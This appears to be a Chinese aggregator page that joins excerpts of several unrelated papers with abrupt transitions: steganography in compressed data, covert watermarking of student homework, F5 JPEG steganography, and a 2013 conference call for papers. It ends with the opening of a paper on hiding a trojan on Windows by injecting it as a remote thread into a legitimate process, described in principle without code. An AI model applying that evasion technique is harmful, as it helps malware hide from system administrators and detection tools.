時間:2023-03-27 16:39:41
緒論:在尋找寫作靈感嗎?愛發(fā)表網(wǎng)為您精選了8篇隱藏技術(shù)論文,愿這些內(nèi)容能夠啟迪您的思維,激發(fā)您的創(chuàng)作熱情,歡迎您的閱讀與分享!
關(guān)鍵詞:信息隱匿,壓縮編碼,數(shù)據(jù)變換,數(shù)據(jù)選擇
1 引言
信息隱藏是一門新興的信息安全技術(shù)。論文參考。涉及感知學(xué),信息論,密碼學(xué)等多個學(xué)科領(lǐng)域,涵蓋信號處理,擴頻通信等多專業(yè)技術(shù)。 近年來得到了迅猛發(fā)展?,F(xiàn)階段人們一般選擇圖像、文本、音頻和視頻等數(shù)字媒體作為載體。另外, 還出現(xiàn)了基于TCP/IP 的信息隱藏技術(shù)和基于信道編碼的信息隱藏技術(shù)。本文研究的基于壓縮編碼的信息隱藏技術(shù)是信息隱藏技術(shù)的新領(lǐng)域, 它以多媒體系統(tǒng)中的壓縮數(shù)據(jù)作為嵌入載體,數(shù)據(jù)解壓后不影響原始數(shù)據(jù)數(shù)據(jù)的結(jié)構(gòu)和統(tǒng)計特性, 具有較強的魯棒性和不可檢測性。
2 壓縮編碼信息隱藏的原理
壓縮編碼是一種提高數(shù)據(jù)傳輸有效性的技術(shù),它是通過對數(shù)據(jù)施加某種操作或變換使之長度變短或者容量變小的同時, 還必須保證原始數(shù)據(jù)能夠從壓縮產(chǎn)生的壓縮碼中得以精確的還原。從信息論的角度來看,壓縮就是去掉信息中的冗余,即保留不確定的信息,去掉確定的信息(可推知的),也就是用一種更接近信息本質(zhì)的描述來代替原有冗余的描述。這個本質(zhì)的東西就是信息量(即不確定因素)。信息隱匿和數(shù)據(jù)壓縮在本質(zhì)上是相互聯(lián)系的:對于數(shù)據(jù)壓縮來講,一塊數(shù)據(jù)中隱匿了和數(shù)據(jù)本身無關(guān)的地的其它數(shù)據(jù),那這塊隱藏了信息的數(shù)據(jù)是有一定冗余的,由冗余的數(shù)據(jù)可以進(jìn)一步被壓縮,進(jìn)一步壓縮的就有可能去掉隱匿的數(shù)據(jù);對于信息隱匿來說,一塊已被壓縮過的數(shù)據(jù)冗余量已經(jīng)很小了,由于隱匿是嵌入的數(shù)據(jù)和原始數(shù)據(jù)毫無關(guān)系,在這塊數(shù)據(jù)中進(jìn)一步隱匿數(shù)據(jù),勢必造成原始掩護(hù)數(shù)據(jù)的有效數(shù)據(jù)的減少,相當(dāng)于隊已經(jīng)壓縮的數(shù)據(jù)進(jìn)行進(jìn)一步壓縮。只要保證在接收端解壓中可以恢復(fù)原始數(shù)據(jù)的差錯率,就可以在壓縮編碼后進(jìn)行信息隱匿,不會引起截獲者懷疑碼字載體中含有秘密信息。
3 壓縮編碼信息隱匿模型實現(xiàn)方案
基于信息隱匿和數(shù)據(jù)壓縮的關(guān)系,提出結(jié)構(gòu)如下的數(shù)據(jù)壓縮思想的通用隱匿模型。模型主要由三個部分組成:圖像壓縮、信息加密和信息隱匿。圖像壓縮部分的量化器輸出至信息隱匿部分,然后從信息隱匿部分得到隱藏有其他信息的量化數(shù)據(jù),并送到熵編碼器,其他內(nèi)容和標(biāo)準(zhǔn)壓縮過程一致。信息加密部分為傳統(tǒng)的加密方案,其主要目的是增加秘密信息的安全性,使得系統(tǒng)隱匿的信息部分即使被檢測出來,也不會泄露其內(nèi)容。論文參考。
信息隱匿部分是模擬最核心的內(nèi)容,這部分主要有三個部分組成:數(shù)據(jù)變換,數(shù)據(jù)選擇和嵌入過程。數(shù)據(jù)變化的主要目的是改變加密后的信息統(tǒng)計特性,使得這些數(shù)據(jù)嵌入掩護(hù)圖像量化后的數(shù)據(jù)之中,不改變或很少改變掩護(hù)圖像的數(shù)據(jù)統(tǒng)計特性,從而使信息隱匿后的抗檢測性大大增強。數(shù)據(jù)選擇是從掩護(hù)圖像量化后的數(shù)據(jù)中選擇合適的比特位,用它來隱藏已加密的信息。合理的數(shù)據(jù)選擇算法應(yīng)該兼顧信息隱匿的容量,信息隱匿的抗檢測性與魯棒性。嵌入過程式將加密后的信息和選擇出來的數(shù)據(jù)進(jìn)行某種運算(通稱為替換或異或),用運算結(jié)果替換選擇出來的數(shù)據(jù),并將此數(shù)據(jù)連同未選擇出來的量化數(shù)據(jù)一并交給圖像壓縮部分的熵編碼進(jìn)行編碼。
圖1 基于數(shù)據(jù)壓縮思想的通用信息隱匿模型
通用模型的秘密信息提取過程基本上是隱匿的逆過程,其流程圖如下
圖2通用信息隱匿模型的信息提取過程
壓縮后的數(shù)據(jù)首先經(jīng)過熵解碼器解碼,然后進(jìn)行數(shù)據(jù)分離,將未嵌入的數(shù)據(jù)部分送入正常的圖像解碼流程(反量化,反映射變換),而將嵌入數(shù)據(jù)的部分進(jìn)行數(shù)據(jù)提取,如果此過程的算法不是盲的(即需要原始掩護(hù)圖像),則需要分離出來的數(shù)據(jù)和原始掩護(hù)圖像經(jīng)映射變化,量化后的數(shù)據(jù)進(jìn)行運算,將結(jié)果進(jìn)行數(shù)據(jù)恢復(fù)、解密、最后得到嵌入的原始秘密信息。
4 隱匿模型的兩種關(guān)鍵技術(shù)
在這種通用的信息隱匿模型中,數(shù)據(jù)變換和數(shù)據(jù)選擇是關(guān)鍵技術(shù)
數(shù)據(jù)變換的主要目的是改變加密后的信息統(tǒng)計特性,增強系統(tǒng)信息隱匿的抗檢測性能。改變數(shù)據(jù)的統(tǒng)計特性的常用方法是進(jìn)行線性濾波,從本質(zhì)上來講,線性濾波和線性變換是一致的,從頻域上來看,濾波就是對信號頻譜的不同部分進(jìn)行不同的縮放。在技術(shù)上常就是這樣一個過程:DFT→相乘→IDFT,將這一過程合并為一體時,就成為一個單純的線性變換。在復(fù)數(shù)域中進(jìn)行整數(shù)的可逆處理時,數(shù)據(jù)量就會增加一倍,為此可以經(jīng)DFT換成DCT,這樣這一處理過程就成為一實數(shù)域的線性變換問題。
下面介紹整型變換算法的基本過程。
(1)對于給定的線性變換A,如是常見的線性變換,則進(jìn)行(2),否則對其進(jìn)行改造,使det| A ‘ |=1。
(2)將A ‘ 分解為3類基本矩陣(置換矩陣,元素的絕對值均不小于1的對角陣,單位三角矩陣)。
(3)對于每一基本矩陣,構(gòu)造其整型變換,獲得整數(shù)輸出。
(4)對于每一步都應(yīng)有相應(yīng)的逆變換,所以整個變換的逆變換可以相應(yīng)的獲得。
(5)對于多維可分離的線性變換,正變換可以逐維的計算;為了保證逆變換對于多維數(shù)據(jù)的完全重建,應(yīng)嚴(yán)格按照和正變換相反的次序進(jìn)行逆變換。
實現(xiàn)數(shù)據(jù)變換時的另一個問題是數(shù)據(jù)的范圍問題。在實際處理過程中,輸入的數(shù)據(jù)都是有一定的范圍的(比如原始圖像數(shù)據(jù)通常用8位無符號數(shù)據(jù)表示),如果輸出的數(shù)據(jù)不加以限制,則輸出的數(shù)據(jù)的范圍一般要增大,這樣就必須用更多的數(shù)據(jù)表示處理結(jié)果。
數(shù)據(jù)選擇過程是從掩護(hù)圖像的量化數(shù)據(jù)中選擇合適的比特位,用它來隱匿已加密的信息。最基本的做法是選擇掩護(hù)數(shù)據(jù)中的不重要的部分,這樣做得優(yōu)點是對掩護(hù)圖像的質(zhì)量影響最小,使修改引起別人注意的可能性最小。但是在實際系統(tǒng)中,數(shù)據(jù)選擇算法應(yīng)該兼顧信息隱匿的容量,信息隱匿的抗檢測性與魯棒性等多個方面的性能,可以選擇下面三種。
1.LSP(LeastSignificant Portion)最不重要部分
LSP技術(shù)和LSB(最不重要比特位)技術(shù)基本類似,區(qū)別在于LSB平等的對待掩護(hù)圖像中的每一字節(jié),不同的字節(jié)之間沒有區(qū)別,在隱藏時都在數(shù)據(jù)的最低位取相等比特;而LSP針對變換量化后的數(shù)據(jù)而言,不同位置的重要程度不同,從中所取的最低有效比特數(shù)就不同,其中低頻數(shù)據(jù)是取得少一些,而在高頻數(shù)據(jù)中取得多一些。另外,不同位置的數(shù)據(jù)取值范圍也不一樣,最多的可取比特數(shù)也不一樣。論文參考。
2.隨機間隔法
隨機間隔技術(shù)是以LSP為基礎(chǔ)的一種方法,在數(shù)據(jù)選擇時用一個掩密密鑰k作隨機數(shù)發(fā)生的種子,那么可以生成一個隨機序列k 1 ,…,k l ,并且把它們一起按下列方式生成隱匿信息位置來對經(jīng)LSP選擇的數(shù)據(jù)進(jìn)行進(jìn)一步選擇:j 1 =k 1
j i =k i +j i-1
從而可以偽隨機決定兩個嵌入位置的距離。這種方法由于隱匿的位置更少,所以更不容易被檢測出來。
3.隨機位置法
隨機位置技術(shù)是另外一種偽隨機的方法,它也以LSP技術(shù)為基礎(chǔ)。和隨機間隔法不同的是,它對不同的位置變換數(shù)據(jù)及量化數(shù)據(jù)的不同比特位賦予不同的選擇概率p 1 ,…,p l ,在數(shù)據(jù)選擇時也用一個偽裝密鑰k作為隨機發(fā)送的種子,那么可以生成一個一個隨機序列k 1 ,…,k l ,當(dāng)k i ≥p i 時選擇比特,否則不進(jìn)行選擇。在此方法中選擇合適概率取值方案可以兼顧信息隱匿的容量、懸念吸引你的抗檢測性與魯棒性等多方面的性能,是一種更靈活的方法。當(dāng)然可以將隨機間隔法和隨機位置發(fā)結(jié)合起來使用,那是一種更靈活、更復(fù)雜的方案。
5 實驗結(jié)果
運用本文提出的通用模型,以lena(512像素×512像素),作為掩護(hù)圖像,在其中隱匿隨機數(shù)據(jù),映射變換采用8×8的DCT,經(jīng)數(shù)據(jù)變換過程,結(jié)果如下圖所示。圖中從左到右,從上到下依次為:原始圖像,未嵌入數(shù)據(jù)的JPEG圖像,嵌入不等數(shù)據(jù)量的JPEG圖像。隨著嵌入數(shù)據(jù)量的增加,掩護(hù)圖像的直觀質(zhì)量會下降,這種質(zhì)量的下降類似于不同壓縮比條件下JPEG圖像質(zhì)量的不同下降,從信息隱匿的角度來看,這種相似性是有利的。
圖3 圖用模型的數(shù)據(jù)隱匿效果
6 小結(jié)
研究了一種基于壓縮編碼的信息隱匿技術(shù),介紹了信息隱匿通用模型的兩種關(guān)鍵技術(shù):數(shù)據(jù)變換和數(shù)據(jù)選擇技術(shù),通過實驗得到嵌入量與圖像質(zhì)量的關(guān)系。隨著通信技術(shù)的不斷發(fā)展,信息安全將成為一門很重要的學(xué)科,對于通信信息隱匿還要尋找更先進(jìn),更合理的算法來達(dá)到通信的安全性能。
參考文獻(xiàn):
[1] KATZENBEISSERS, PETITCOLASFAP.信息隱藏技術(shù)—隱寫術(shù)與數(shù)字水印[M].吳秋新,鈕心忻,楊義先等譯.北京:人民郵電出版社,2001.
[2] 汪小帆,戴躍偉. 信息隱藏技術(shù)方法與應(yīng)用[M].北京:機械工業(yè)出版社,2001.
[3]柏森,胡中豫,吳樂華等.通信信息隱匿技術(shù)[M].北京:國防工業(yè)出版社,2005.
[4]王偉祥, 劉玉君.基于信道編碼的信息隱藏技術(shù)研究.[J] 電視技術(shù).2003(3).
關(guān)鍵詞:電子作業(yè);抄襲檢查;文檔指紋;信息隱藏
中圖分類號:TP311 文獻(xiàn)標(biāo)識碼:A 文章編號:1009-3044(2012)36-8679-02
隨著計算機應(yīng)用的普及,高校正在逐步實現(xiàn)作業(yè)的電子化和網(wǎng)絡(luò)化。這種作業(yè)形式的改革有效減少了教育資源的浪費,減輕了教師的工作任務(wù),提高了學(xué)生獲得作業(yè)批閱結(jié)果的效率,教與學(xué)得到了互動。應(yīng)該說作業(yè)的電子化是高校教學(xué)改革的一種必然趨勢,但隨之而來的是電子作業(yè)抄襲現(xiàn)象嚴(yán)重。學(xué)生抄襲作業(yè)時,少則部分復(fù)制他人文檔,調(diào)整文檔順序,內(nèi)容稍做修改;多則大部分甚至全盤拷貝他人文檔。學(xué)生對于電子作業(yè)的抄襲輕松快捷又不易被識別,這就成為作業(yè)改革受到嚴(yán)重困擾的主要因素。
在電子作業(yè)的反抄襲檢查工作上,教師的手工操作既耗時又費力,尤以高校學(xué)生人數(shù)眾多,涉及的教師面而變得局限性很大。那么,建立一種快速、準(zhǔn)確、高校的電子作業(yè)反抄襲檢查模型若能夠有效遏制了學(xué)生間電子作業(yè)相互拷貝,具有十分現(xiàn)實的意義。目的在于能夠極大地提高教學(xué)的質(zhì)量和效率,并有力的促進(jìn)高校的教育改革。在應(yīng)用領(lǐng)域抄襲檢測算法已成為當(dāng)前研究的熱點話題,尤其是在學(xué)術(shù)論文的剽竊比對上。而我們能夠在平時的教學(xué)工作中有效地抵制電子作業(yè)的抄襲現(xiàn)象,既能真實反映教學(xué)效果又能提高學(xué)生自主學(xué)習(xí)的意識和能力。這不僅是對于教學(xué)工作的促進(jìn)更是培養(yǎng)人教育人的有效途徑。
1 抄襲檢查技術(shù)
計算機技術(shù)的發(fā)展和網(wǎng)絡(luò)普遍應(yīng)用,在無意間方便了很多人進(jìn)行文章抄襲。其實電子作業(yè)抄襲現(xiàn)象是國內(nèi)外的大學(xué)廣泛存在的現(xiàn)象,為了有力遏制學(xué)生的這種不誠信的行為,國外早在20世紀(jì)90年代就開始了相應(yīng)研究。由于西方語系的特點英語是以空格作為單詞間隔,因此英語的抄襲檢查方法是通過比較關(guān)鍵詞來判斷相似性的,效率很高。而中文與外文間存在著巨大的差異性, 強調(diào)詞法與句法,因此關(guān)鍵詞比對較不適用于中文。
目前中文的抄襲檢查方法主要有基于字符串的匹配、基于統(tǒng)計的中文分詞、文檔指紋、句子相似度等。
2 電子作業(yè)反抄襲檢查的實現(xiàn)
該文主要采用兩種方法以實現(xiàn)電子作業(yè)的反抄襲檢查:數(shù)字指紋技術(shù)和信息隱藏技術(shù)。首先吸取了文數(shù)字指紋技術(shù)的優(yōu)勢并對于指紋技術(shù)的算法(Hash函數(shù))做出改進(jìn)提出一種基于局部詞頻的指紋算法。其次很多高校特有應(yīng)用的實驗實習(xí)電子作業(yè),此時內(nèi)容都較為相似,所以該文又增加了基于信息隱藏技術(shù)的作業(yè)反抄襲檢查方法,以對于這類電子作業(yè)進(jìn)行有效的比對。
2.1基于局部詞頻的指紋技術(shù)
文檔數(shù)字指紋技術(shù)是依據(jù)生成的待比較的文檔指紋,通過在樣本庫中做對比進(jìn)行抄襲檢測。當(dāng)相匹配指紋數(shù)目超過一定值時,可認(rèn)定存在抄襲行為。為使其具有推廣力,一般會引入松弛因子以提高檢測的準(zhǔn)確性。指紋生成算法是文檔數(shù)字指紋技術(shù)的關(guān)鍵,一般利用 Hash 函數(shù)對文檔中的特征標(biāo)記進(jìn)行計算,獲得整數(shù)值。一般需要計算函數(shù)。
在高校的電子作業(yè)中很多都僅是對作業(yè)的句子的長度或詞語的先后次序作了調(diào)整,內(nèi)容的變化是較小的,用這種方法就會過度精確,用于檢查電子作業(yè)效率很低。所以該文對這種算法做出一定改進(jìn),提出一種基于詞頻統(tǒng)計的指紋技術(shù)。局部詞頻統(tǒng)計技術(shù)借助于向量空間模型來實現(xiàn)。這種向量空間模型是由句子為單位構(gòu)成的,并對句子進(jìn)行關(guān)鍵詞提取,并對關(guān)鍵詞重新排序構(gòu)建,根據(jù)編碼與詞頻共同獲取句子的指紋。依據(jù)句子的指紋獲取文本相似度,具體的算法描述
2.2信息隱藏技術(shù)
在高校學(xué)生作業(yè)有一些是比較特殊的,例如在機房中完成的實驗實習(xí)類報告,這類作業(yè)的特點是內(nèi)容大致是相同的??梢栽谧鳂I(yè)的源頭采用一些基于信息隱藏的嵌入水印算法。在對作業(yè)進(jìn)行片段拷貝時就在源頭嵌入水印,能有效的防止拷貝抄襲的現(xiàn)象發(fā)生。這樣即使電子作業(yè)的內(nèi)容完全相同也能有效的檢查到。不能輕易被破壞。這類作業(yè)防抄襲檢查的水印嵌入既要求字符格式改變不易被擦覺也要兼顧有較大的信息嵌入量,不需太多的字符就能嵌入進(jìn)機房的機器號及上機完成作業(yè)的時間。
由于人眼的視細(xì)胞對顏色敏感度的理論指出人眼對綠色最敏感,其次是紅色,而對于藍(lán)色是最不敏感的。而計算機的顏色設(shè)置理論是數(shù)字化的,所以可以對于RGB()的值中低位的值做秘密信息嵌入。可以對R值和G值改變都改變最低的1位bit,而對B值最低的2位bit。這樣就對每個電子文檔的字符嵌入了4位bit的信息隱藏,并把這4位二進(jìn)制作為嵌入信息隱藏1Byte的高4位。同時也可以利用字符下劃線的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit來隱藏4位信息。這4位bit作為嵌入信息隱藏1Byte的低4位。
在實際操作中程序所嵌入的信息包括程序讀取的機器號及上機時間與機房管理系統(tǒng)數(shù)據(jù)庫配合能準(zhǔn)確定位學(xué)生的學(xué)號、姓名、班級等。當(dāng)學(xué)生完成自己的電子作業(yè)過程中點擊保存、Word程序自動保存、關(guān)閉Word文檔時都會觸發(fā)這一嵌入秘密信息的相關(guān)程序的運行,可以在全文實現(xiàn)循環(huán)嵌入秘密信息的作用。該反抄襲程序是在打開作業(yè)文檔時自動運行,能自主識別學(xué)生作業(yè)中具有抄襲嫌疑的片段,協(xié)助教師對學(xué)生的作業(yè)給出客觀評價,有效的對這類作業(yè)的抄襲起到屏蔽的作用。
3 結(jié)束語
在以往的反抄襲檢查中主要是通過文檔間內(nèi)容重疊程度或者相似程度來斷定的,相關(guān)的檢查技術(shù)也很多也較成熟。但往往面對的是海量數(shù)據(jù)或是長文檔,并需要對文檔字符做精確檢查。而在教學(xué)過程中的電子作業(yè)無論在內(nèi)容、篇幅和數(shù)量方面都有很大差別。
該文的創(chuàng)新點是結(jié)合了基于局部詞頻的指紋技術(shù)和嵌入水印的信息隱藏技術(shù),提出了一處主要針對高校的作業(yè)特點的反抄襲檢查的模型。較為全面的考慮到了這類作業(yè)不同于學(xué)術(shù)剽竊的相關(guān)問題,所建立的這種快速、準(zhǔn)確、高效的電子作業(yè)反抄襲檢查模型能夠在一定程度上遏制學(xué)生間電子作業(yè)相互拷貝,具有十分現(xiàn)實的意義。
參考文獻(xiàn):
[1] 蔣波.一種基于三重DES和RSA的綜合加密方案[J].微計算機信息,2007(18).
[2] 陳國良.并行算法實踐[M].北京:高等教育出版社,2004.
[3] 秦玉平,冷強奎,王秀坤,等. 基于局部詞頻指紋的論文抄襲檢測算法[J].計算機工程,2011(6).
[4] 付兵.基于信息隱藏技術(shù)的電子作業(yè)防抄襲研究[J].微計算機信息,2009(18).
關(guān)鍵詞:JPEG圖像;隱寫算法;信息隱藏;隱寫分析
中圖分類號:TN919.81文獻(xiàn)標(biāo)識碼:A文章編號:1007-9599 (2010) 06-0000-01
Design&Implement of JPEG Image Steganography and Steganalysis Algorithm
Du Mingzhi
(Information Computer science Department,Fujian University of Technology,Fuzhou350108,China)
Abstract:At the base of introducing the status quo on the technology of information hidding and JPEG image steganography and steganalysis,This paper studied and implemented the F5 steganography algorithm of JPEG image.
Keywords:JPEGImage;Steganography algorithm;Information steganography;
Steganalysis
JPEG圖像由于它的高壓縮率和高表現(xiàn)性等優(yōu)點,在Intrenet等環(huán)境中被廣泛應(yīng)用,因此,用JPEG圖像為載體進(jìn)行信息隱藏具有重要的應(yīng)用價值。目前已經(jīng)有多種實現(xiàn)JPEG圖像隱寫的技術(shù),如Jsteg、F5、OutGuess等。然而這些方法往往會改變JPEG圖像的分塊特性及DCT系數(shù)直方圖等統(tǒng)計特性,為攻擊者提供線索。目前,根據(jù)公開發(fā)表的論文,JPEG圖像隱寫算法的安全性越來越高,隱寫檢測利用的理論和技術(shù)也越來越復(fù)雜,難度不斷增加。
一、JPEG的研究模式
JPEG有幾種模式,其中最常用的是基于DCT變換的順序型模式,又稱為基本系統(tǒng),下面專門討論這種模式。圖像不以RGB坐標(biāo)表示,而是使用的顏色是YUV格式,以一個亮度分量Y、兩個色度分量U、V表示。因此,首先將RGB格式的圖像轉(zhuǎn)化為YUV格式(或叫做YIQ,YcrCb格式)。我們都知道,原始的彩色圖像,一般由紅、綠、藍(lán)三種基色的圖像組成。然而人的視覺系統(tǒng)對彩度的感覺和亮度的敏感性是不同的,在這里,首先介紹一下YUV格式。在JPEG發(fā)展過程中,實際使用的是YcrCb坐標(biāo)系統(tǒng),其中Y不變,Cr=(V/1.6)+0.5,Cb=(U/2)+0.5,通過這種壓縮變換和0點轉(zhuǎn)移,色度的值就總在1和0之間變化,乘于255就剛好能用一字節(jié)(8比特)表示。
二、算法的設(shè)計與實現(xiàn)
BMP是英文Bitmap(位圖)的簡寫,它是Windows操作系統(tǒng)中的標(biāo)準(zhǔn)圖像文件格式,能夠被多種Windows應(yīng)用程序所支持。這種格式使用很普遍,其結(jié)構(gòu)簡單,包含的圖像信息較豐富,但由于未經(jīng)過壓縮,通常文件量較大。研究JPEG圖像的壓縮過程發(fā)現(xiàn),在把BMP對象壓縮位JPEG圖像的中間過程中,可以通過改變量化后的DCT系數(shù)達(dá)到信息隱藏的目的。本文要介紹的方法也是通過少量改變量化后的DCT以達(dá)到隱寫目的。本算法實現(xiàn)JPEG圖像的信息隱藏,主要包括信息提取和信息嵌入兩個模塊。信息嵌入模塊:使用隱寫算法,把秘密信息隱藏在JPEG圖像中。信息提取模塊:根據(jù)提取算法,從帶秘密信息的JPEG圖像中提取秘密信息。
(一)混亂算法:如果把秘密信息順次地嵌入到DCT序數(shù)上,那么秘密信息將會集中于圖像的某一部分,從而導(dǎo)致圖像質(zhì)量不均衡。為了進(jìn)一步提高隱寫算法的性能,我們在隱寫算法中加入了混亂算法,通過混亂算法,可以使嵌入的秘密信息均勻的分布到整幅圖像中。
(二)矩陣編碼:矩陣編碼的目的是提高嵌入效率,使每個DCT系數(shù)的更改可以嵌入更多的秘密比特,即在2k-1個原始DCT系數(shù)中最多改變1比特達(dá)到嵌入k比特秘密信息的效果,有效減少JPEG圖像DCT系數(shù)的改變量,從而提高隱寫算法的安全性。
(三)嵌入算法:整合了混亂和矩陣編碼技術(shù)的隱寫嵌入算法如下:
1.對BMP圖像進(jìn)行色彩變換、離散余弦變換(DCT),量化DCT系數(shù)。
2.根據(jù)密鑰產(chǎn)生隨機序列,用于混亂嵌入,密鑰做為隨機因子。
3.根據(jù)隨機序列嵌入秘密文件的信息DD秘密文件長度(用32位表示);
4.確定k,并計算n=2k-1。
5.實施矩陣編碼嵌入。取出欲嵌入的k個秘密比特,n個非0的DCT系數(shù),計算是否需要改動DCT系數(shù),如果不需要改變則進(jìn)行下一組嵌入,如果需要改動,則根據(jù)規(guī)則改變,然后進(jìn)行下一組嵌入,直到嵌入完成。
6.對改變過的DCT做哈夫曼壓縮,產(chǎn)生密寫后的圖像。
(四)提取算法:以下是帶混亂和矩陣編碼的隱寫提取算法:
1.哈夫曼解碼JPEG圖像,得到所有的DCT系數(shù)。
2.根據(jù)密鑰產(chǎn)生隨機序列,用于混亂嵌入,密鑰做為隨機因子。
3.根據(jù)提取秘密文件信息頭(32位),得到秘密文件的長度。
4.計算n和k。
5.實施矩陣解碼,提取秘密信息。取n個非0的DCT系數(shù),根據(jù)計算得到k個秘密比特,進(jìn)入下一組提取,直到完成提取。
6.二進(jìn)制輸出秘密信息,得到秘密文件。
三.算法的優(yōu)化設(shè)計
根據(jù)已發(fā)表的論文,簡單的JPEG圖像隱寫效率大概是12%,即秘密信息能占到壓縮完的JPEG圖像大小的12%。算法同時也保持了圖像直方圖的一般特性,原始圖像的DCT系數(shù)直方圖特性依然得到保持。但F5算法因為沒有使用值為0的DCT系數(shù),而嵌入的時候又會有新的值為0的DCT系數(shù)產(chǎn)生,所以雖然保持了直方圖特性,但壓縮后的JPEG圖像值為0的系數(shù)會比原始圖像突出。接下來的算法的優(yōu)化設(shè)計將會提出一種新方法解決這個問題。
采用F5算法隱寫,DCT系數(shù)的絕對值被減1處理,所以隱寫后的直方圖就會和原始圖像有差別,直方圖將會從兩端向中間收縮。根據(jù)柯克霍夫(Kerckhoffs)原則,隱寫算法并不是通過算法的保密來到達(dá)隱寫的安全的,而是通過密鑰來體現(xiàn)的。這要求隱寫圖像不能明顯改動原始圖像的特性,當(dāng)然,只是理想的狀態(tài),沒有隱寫算法能夠達(dá)到這個安全級別,為了提高JPEG圖像隱寫的安全性,使算法不改變原始圖像的直方圖特性,我介紹一種改進(jìn)的方法,并給出相應(yīng)的數(shù)學(xué)證明。改進(jìn)算法遵循的原則:
(一)由于視覺上對低頻分量比較敏感,因此直流系數(shù)不用于負(fù)載秘密信息。
(二)JPEG圖像中,大部分DCT系數(shù)都是0,如果在這些系數(shù)上隱寫會減少0的數(shù)量,引起分析者懷疑,所以也不在值為0的DCT系數(shù)上負(fù)載秘密信息。
(三)用正奇數(shù)和負(fù)偶數(shù)表示秘密比特1,負(fù)奇數(shù)和正偶數(shù)表示秘密比特0,當(dāng)欲嵌入的比特與DCT系數(shù)代表的信息不相同時,改變DCT系數(shù)的值。
(四)算法根據(jù)Hi提供的統(tǒng)計信息按概率隨機改變DCT系數(shù)的值(絕對值增1或減1),例外情況是當(dāng)DCT值為1時,要修改到-1或+2,當(dāng)DCT系數(shù)值為-1時,要修改值為-2或+1。
參考文獻(xiàn):
[1]張華熊.信息隱藏――數(shù)字水印技術(shù)研究:[博士學(xué)位論文].浙江:浙江大學(xué),2003
ICICS 2013將為國內(nèi)外信息安全學(xué)者與專家齊聚一堂,提供探討國際信息安全前沿技術(shù)的難得機會。作為國際公認(rèn)的第一流國際會議,ICICS 2013將進(jìn)一步促進(jìn)國內(nèi)外的學(xué)術(shù)交流,促進(jìn)我國信息安全學(xué)科的發(fā)展。本次學(xué)術(shù)會議將由中國科學(xué)院軟件研究所、北京大學(xué)軟件與微電子學(xué)院和中國科學(xué)院信息工程研究所信息安全國家重點實驗室主辦,并得到國家自然基金委員會的大力支持。
會議論文集均由德國Springer出版社作為LNCS系列出版。ICICS2013歡迎來自全世界所有未發(fā)表過和未投遞過的原始論文,內(nèi)容包括訪問控制、計算機病毒與蠕蟲對抗、認(rèn)證與授權(quán)、應(yīng)用密碼學(xué)、生物安全、數(shù)據(jù)與系統(tǒng)安全、數(shù)據(jù)庫安全、分布式系統(tǒng)安全、電子商務(wù)安全、欺騙控制、網(wǎng)格安全、信息隱藏與水印、知識版權(quán)保護(hù)、入侵檢測、密鑰管理與密鑰恢復(fù)、基于語言的安全性、操作系統(tǒng)安全、網(wǎng)絡(luò)安全、風(fēng)險評估與安全認(rèn)證、云安全、無線安全、安全模型、安全協(xié)議、可信計算、可信賴計算、智能電話安全、計算機取證等,但又不局限于此內(nèi)容。
作者提交的論文,必須是未經(jīng)發(fā)表或未并行地提交給其他學(xué)術(shù)會議或?qū)W報的原始論文。所有提交的論文都必須是匿名的,沒有作者名字、單位名稱、致謝或其他明顯透露身份的內(nèi)容。論文必須用英文,并以 PDF 或 PS 格式以電子方式提交。排版的字體大小為11pt,并且論文不能超過12頁(A4紙)。所有提交的論文必須在無附錄的情形下是可理解的,因為不要求程序委員閱讀論文的附錄。如果提交的論文未遵守上述投稿須知,論文作者將自己承擔(dān)論文未通過形式審查而拒絕接受論文的風(fēng)險。審稿將由3位程序委員匿名評審,評審結(jié)果為:以論文形式接受;以短文形式接受;拒絕接受。
ICICS2013會議論文集可在會議其間獲取。凡接受論文的作者中,至少有1位必須參加會議,并在會議上報告論文成果。
投稿截止時間:2013年6月5日 通知接受時間:2013年7月24日 發(fā)表稿提交截止時間:2013年8月14日
會議主席:林東岱 中國科學(xué)院信息工程研究所 研究員
程序委員會主席:卿斯?jié)h 中國科學(xué)院軟件研究所、北京大學(xué)軟件與微電子學(xué)院 教授
Jianying ZHOU博士 Institute for Infocomm Research,新加坡
程序委員會:由國際和國內(nèi)知名學(xué)者組成(參看網(wǎng)站 http://icsd.i2r.a-star.edu.sg/icics2013/)
摘要進(jìn)程的隱藏一直是木馬程序設(shè)計者不斷探求的重要技術(shù),本文采用遠(yuǎn)程線程技術(shù),通過動態(tài)鏈接庫方法,較好地解決了這一問題,通過遠(yuǎn)程線程將木馬作為線程隱藏在其他進(jìn)程中,從而達(dá)到隱藏的目的。
關(guān)鍵字進(jìn)程線程木馬動態(tài)鏈接庫
木馬程序(也稱后門程序)是能被控制的運行在遠(yuǎn)程主機上的程序,由于木馬程序是運行在遠(yuǎn)程主機上,所以進(jìn)程的隱藏?zé)o疑是大家關(guān)心的焦點。
本文分析了WindowsNT/2000系統(tǒng)下進(jìn)程隱藏的基本技術(shù)和方法,并著重討論運用線程嫁接技術(shù)如何實現(xiàn)WindowsNT/2000系統(tǒng)中進(jìn)程的隱藏。
1基本原理
在WIN95/98中,只需要將進(jìn)程注冊為系統(tǒng)服務(wù)就能夠從進(jìn)程查看器中隱形,可是這一切在WindowsNT/2000中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能躲過WindowsNT/2000的任務(wù)管理器,WindowsNT/2000的任務(wù)管理器均能輕松顯示出木馬進(jìn)程,難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進(jìn)程了?我們知道,在WINDOWS系統(tǒng)下,可執(zhí)行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進(jìn)程,尋找特定進(jìn)程是我們發(fā)現(xiàn)木馬的方法之一,隨著入侵檢測軟件的不斷發(fā)展,關(guān)聯(lián)進(jìn)程和SOCKET已經(jīng)成為流行的技術(shù),假設(shè)一個木馬在運行時被檢測軟件同時查出端口和進(jìn)程,我們基本上認(rèn)為這個木馬的隱藏已經(jīng)完全失敗。在WindowsNT/2000下正常情況用戶進(jìn)程對于系統(tǒng)管理員來說都是可見的,要想做到木馬的進(jìn)程隱藏,有兩個辦法,第一是讓系統(tǒng)管理員看不見你的進(jìn)程;第二是不使用進(jìn)程。本文以第二種方法為例加以討論,其基本原理是將自已的木馬以線程方式嫁接于遠(yuǎn)程進(jìn)程之中,遠(yuǎn)程進(jìn)程則是合法的用戶程序,這樣用戶管理者看到的只是合法進(jìn)程,而無法發(fā)現(xiàn)木馬線程的存在,從而達(dá)到隱藏的目的。
